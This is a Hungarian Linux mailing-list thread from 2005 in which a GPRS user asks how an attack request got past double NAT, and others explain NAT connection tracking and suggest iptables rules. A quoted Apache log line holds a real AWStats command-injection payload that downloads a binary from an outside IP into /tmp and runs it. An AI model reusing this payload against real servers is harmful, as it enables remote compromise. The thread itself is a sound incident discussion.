Re: NAT-olt halózat MAC címei-hez kapcsolodo kerdes
Kiss Gabor <[EMAIL PROTECTED]> wrote: > A NAT router nem tartja nyilvan a kimeno csomag destination addresset, > ezert aztan nincs is mivel osszehasonlitania a bejovo csomag > source addresset. Ez még az általad idézett oldalról nézve sem evidens, nem tudom, honnan vezetted ezt le. Egyébként pedig muszáj neki, mert csak ez alapján tudja azonosítani a kapcsolatot, amihez a válaszcsomag is tartozik. -- --- Friczy --- 'Death is not a bug, it's a feature' _ linux lista - linux@mlf.linux.rulez.org http://mlf2.linux.rulez.org/mailman/listinfo/linux
Re: NAT-olt halózat MAC címei-hez kapcsolodo kerdes
Mihaly Zachar <[EMAIL PROTECTED]> wrote: > Kiss Gabor wrote: [...] >> A NAT router nem tartja nyilvan a kimeno csomag destination addresset, >> ezert aztan nincs is mivel osszehasonlitania a bejovo csomag >> source addresset. > > szerintem nyilvan tartja a csomag destination addresset... > legalabbis a linux igen, cisco is tudtommal, talan olcso home router-ek > implementacioja megengedi ezt az "aprosagot". > > bocs, nem olvastam el a linket amit irtal, nincs idom, de nezz bele a > /proc/net/ip_conntrack tablaba... Ha jól tippelek, ez arra kell, hogy a tűzfalban az ESTABLISHED és a RELATED szabályok működjenek. Ha nincs semmi szűrés a NAT-oló gépen, akkor ha véletlenül rátalálnak a nyitott portra, akkor bejöhet a csomag. Ezért kellenek egy ilyen jellegű szabályok: -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT -A FORWARD -i ! ppp0 -m state --state NEW -j ACCEPT -A FORWARD -j DROP Bye,NAR _ linux lista - linux@mlf.linux.rulez.org http://mlf2.linux.rulez.org/mailman/listinfo/linux
Re: NAT-olt halózat MAC címei-hez kapcsolodo kerdes
In article <[EMAIL PROTECTED]>, Zidarics Zoltan <[EMAIL PROTECTED]> writes: >> Ki beszelt itt tuzfalrol? >> A NAT onmagaban nem jelent szurest (forgalomkorlatozast), csak >> az IP cimek csereberejet oda-vissza. > Aha, azt hittem legalabb egy belulrol mindent, kivulrol csak valasz tipusu > szures van. Dinamikus kapcsolatkezeles eseten a mechanizmusbol fakad, hogy a NAT tablazataba csak olyan belso_gep/belso_port/publikus_cim/publikus_port negyesek kerulnek be, mely belso cimekrol indult kifele kapcsolat, es egy ido utan el is tunnek. De addig barki kuldhet kivulrol egy IP csomagot a publikus_cim:publikus_portra, amit a NAT szerver a belso_gep:belso_port-ra tovabbit. Statikus bejegyzeseknel meg az idokorlat sincs. >> Inkabb az a furcsa, hogy a te 80-as portod (mar ha azon ul >> egyaltalan az apache), hogy kerult be a NAT kapcsolatokat >> nyilvantarto tablazataba. >> Fut nalad olyan program, amely a 80-as portrol inditott >> kifele egy TCP kapcsolatot? > Persze, ez a desktop gepem, firefox fut rajta Na es? Egy tipikus kifele indulo TCP kapcsolat egy 1024 feletti veletlenszeruen valasztott[*] source portot hasznal. Osszekevered a destination porttal. * Veletlenszeruenek (megjosolhatatlannak) kellene lennie. A gyakorlatban tobbnyire a legutoljara hasznalt portszam+1. kissg _ linux lista - linux@mlf.linux.rulez.org http://mlf2.linux.rulez.org/mailman/listinfo/linux
Re: NAT-olt halózat MAC címei-hez kapcsolodo kerdes
2005. december 23. 10.57 dátummal Kiss Gabor ezt írta: > > Kerdeseim: > > 1. dupla nat-on hogy talalt meg (jo biztos scannelt, de hogy tud kivulrol > > beinjektalni uj http kerest a tuzfal moge)? > > Ki beszelt itt tuzfalrol? > A NAT onmagaban nem jelent szurest (forgalomkorlatozast), csak > az IP cimek csereberejet oda-vissza. Aha, azt hittem legalabb egy belulrol mindent, kivulrol csak valasz tipusu szures van. > Inkabb az a furcsa, hogy a te 80-as portod (mar ha azon ul > egyaltalan az apache), hogy kerult be a NAT kapcsolatokat > nyilvantarto tablazataba. > Fut nalad olyan program, amely a 80-as portrol inditott > kifele egy TCP kapcsolatot? Persze, ez a desktop gepem, firefox fut rajta > Mert ha igen, akkor egy darabig nyitva allt a 80-as portod a vilag > fele. (Az persze ugy latta, mint a (84.224.11.177-es cimu gep > 21802-es portjat [most ex has mondtam egy szamot]). Es eppen egybe esett a scan az ip-vel es a porttal... -- koszi, Zoltan Zidarics programmer PTE University Pecs, Hungary icq: 43288694 _ linux lista - linux@mlf.linux.rulez.org http://mlf2.linux.rulez.org/mailman/listinfo/linux
Re: NAT-olt halózat MAC címei-hez kapcsolodo kerdes
In article <[EMAIL PROTECTED]>, Zidarics Zoltan <[EMAIL PROTECTED]> writes: > Nem erre a temara valaszolnek, hanem ezzel kapcsolatban egy erdekes kerdes: > Otthon Pannon GSM gprs internetet hasznalok. Dupla NAT van, hogy egymast se > tudjak a kliensek pingetni. Az internet felol a pgsm a > Ehhez kepest Penteken az alabbi Apache logot talaltam: > 80.48.159.254 - - [16/Dec/2005:23:36:07 +0100] > Nem vagyok egy halozati guru, de nekem ugy tunt, ez kivulrol jott. Igen. > Kerdeseim: > 1. dupla nat-on hogy talalt meg (jo biztos scannelt, de hogy tud kivulrol > beinjektalni uj http kerest a tuzfal moge)? Ki beszelt itt tuzfalrol? A NAT onmagaban nem jelent szurest (forgalomkorlatozast), csak az IP cimek csereberejet oda-vissza. Inkabb az a furcsa, hogy a te 80-as portod (mar ha azon ul egyaltalan az apache), hogy kerult be a NAT kapcsolatokat nyilvantarto tablazataba. Fut nalad olyan program, amely a 80-as portrol inditott kifele egy TCP kapcsolatot? Mert ha igen, akkor egy darabig nyitva allt a 80-as portod a vilag fele. (Az persze ugy latta, mint a (84.224.11.177-es cimu gep 21802-es portjat [most ex has mondtam egy szamot]). kissg _ linux lista - linux@mlf.linux.rulez.org http://mlf2.linux.rulez.org/mailman/listinfo/linux
Re: NAT-olt halózat MAC címei-hez kapcsolodo kerdes
Hello, Nem erre a temara valaszolnek, hanem ezzel kapcsolatban egy erdekes kerdes: Otthon Pannon GSM gprs internetet hasznalok. Dupla NAT van, hogy egymast se tudjak a kliensek pingetni. Az internet felol a pgsm a netacc-gpn-11-177.gprs.pgsm.hu (84.224.11.177) cimen latszik. A ppp idevago resze: local IP address 84.224.11.177 remote IP address 192.168.254.254 Ehhez kepest Penteken az alabbi Apache logot talaltam: 80.48.159.254 - - [16/Dec/2005:23:36:07 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20Y YY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2f listen%3bchmod%20%2bx%20listen%3b%2e%2flisten%2021 6%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" (A query_string-et en tortem, hogy ne legyenek tul hosszu sorok) ugyanez ismetlodott kicsit kesobb a 213.58.148.5 majd a 70.150.56.16 cimrol. A host parancs egyiket sem tudta nevesiteni, pingetni tudtam oket, a traceroute a fel vilagon keresztulvezetett (lasd a level vegen). Nem vagyok egy halozati guru, de nekem ugy tunt, ez kivulrol jott. Kerdeseim: 1. dupla nat-on hogy talalt meg (jo biztos scannelt, de hogy tud kivulrol beinjektalni uj http kerest a tuzfal moge)? 2. Ertesitsem a rendszergazdat, vagy ne ugraljak? koszi, Zamek traceroute to 70.150.56.16 (70.150.56.16), 30 hops max, 40 byte packets 1 10.26.11.1 (10.26.11.1) 901.690 ms 530.204 ms 559.023 ms 2 10.26.11.254 (10.26.11.254) 536.043 ms 548.006 ms 563.975 ms 3 10.22.2.251 (10.22.2.251) 540.004 ms 511.974 ms 540.005 ms 4 193.225.153.137 (193.225.153.137) 556.007 ms 587.973 ms 604.015 ms 5 a5-0-0-3.border0.net.telekom.hu (145.236.254.49) 604.044 ms 563.938 ms 660.025 ms 6 vl2118.osr0-vhugo.net.telekom.hu (81.183.246.69) 700.018 ms 543.975 ms 560.005 ms 7 vl2118.osr0-vhugo.net.telekom.hu (81.183.246.69) 560.036 ms 544.035 ms 539.940 ms 8 217.6.24.221 (217.6.24.221) 580.014 ms 571.976 ms 580.047 ms 9 nyc-e5.NYC.US.net.DTAG.DE (62.154.14.53) 659.983 ms 643.981 ms * 10 so-1-3-0.gar1.NewYork1.Level3.net (4.68.111.69) 1460.194 ms 65.59.192.5 (65.59.192.5) 827.996 ms 1372.094 ms 11 ae-1-51.bbr1.NewYork1.Level3.net (4.68.97.1) 984.035 ms ae-1-55.bbr1.NewYork1.Level3.net (4.68.97.129) 645.666 ms ae-1-53.bbr1.NewYork1.Level3.net (4.68.97.65) 643.981 ms 12 ae-0-0.bbr2.Atlanta1.Level3.net (64.159.1.46) 667.917 ms as-2-0.bbr1.Atlanta1.Level3.net (64.159.1.1) 659.945 ms ae-0-0.bbr2.Atlanta1.Level3.net (64.159.1.46) 660.819 ms 13 4.68.103.6 (4.68.103.6) 667.976 ms 671.950 ms 4.68.103.102 (4.68.103.102) 688.029 ms 14 BELLSOUTH-TE.gar1.Level3.net (67.72.8.42) 688.006 ms 663.959 ms 684.021 ms 15 axr00asm-0-0-0.bellsouth.net (65.83.236.1) 676.080 ms 679.870 ms 720.062 ms 16 65.83.237.145 (65.83.237.145) 719.980 ms 647.975 ms 782.245 ms 17 205.152.128.93 (205.152.128.93) 777.853 ms 671.942 ms 676.037 ms 18 68.208.254.198 (68.208.254.198) 683.998 ms 739.989 ms 712.062 ms 19 70.150.56.16 (70.150.56.16) 743.996 ms 707.851 ms 779.992 ms -- Zoltan Zidarics programmer PTE University Pecs, Hungary icq: 43288694 _ linux lista - linux@mlf.linux.rulez.org http://mlf2.linux.rulez.org/mailman/listinfo/linux